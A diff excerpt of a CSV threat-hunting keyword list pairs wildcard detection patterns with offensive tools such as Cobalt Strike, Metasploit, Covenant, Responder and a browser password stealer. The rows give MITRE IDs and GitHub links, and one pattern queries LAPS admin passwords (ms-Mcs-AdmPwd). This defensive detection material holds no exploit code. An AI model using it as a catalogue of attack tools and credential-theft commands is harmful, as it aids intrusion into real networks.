Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*bootkit-rs-master*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*BorjaMerino*Pazuzu*","offensive_tool_keyword","Pazuzu","Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory. This can be useful in various scenarios.","T1055 - T1027 - T1071 - T1059","TA0002 - TA0005 - TA0011","N/A","N/A","Exploitation tools","https://github.com/BorjaMerino/Pazuzu","1","1","N/A","N/A","3","213","70","2020-08-04T18:49:36Z","2015-10-05T12:23:17Z" "*Bot_MSF_Exp_*.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Bot_Python_Poc_Log4j2_VMwareHorizon.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" @@ -7955,59 +8102,59 @@ "*breg query *HK*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*breg_add_string_value*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*bremote_exec*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" -"*breviaries -Properties DnsHostName*ms-Mcs-AdmPwd*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*breviaries -Properties DnsHostName*ms-Mcs-AdmPwd*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*brew install sniffer*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","0","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z" "*bropper.py *","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*Bropper-main.zip*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*browser.keylog_file.write*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" "*browser_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*browser_autopwn*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*browser_autopwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*browser_autopwn2_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*browser_exploit.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*browser_exploit_server_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*browser_autopwn*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*browser_autopwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*browser_autopwn2_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*browser_exploit.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*browser_exploit_server_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*BrowserBookmarkDiscovery_BrowserHistory.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Browser-C2.git*","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1043 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","99","32","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" "*Browser-C2-master.zip*","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1043 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","99","32","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" -"*browserexploitserver.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*browserexploitserver.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*BrowserGhost-N*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" -"*BrowserListener.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*BrowserListener.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*Browser-password-stealer.git*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*Browser-password-stealer-master*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*browserpivot *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*brun_script_in_mem*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*brunasadmin*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*Brute/Brute.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*Brute/Brute.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*Brute/Brute.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Brute/Brute.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Brute/Brute.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Brute/Brute.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" 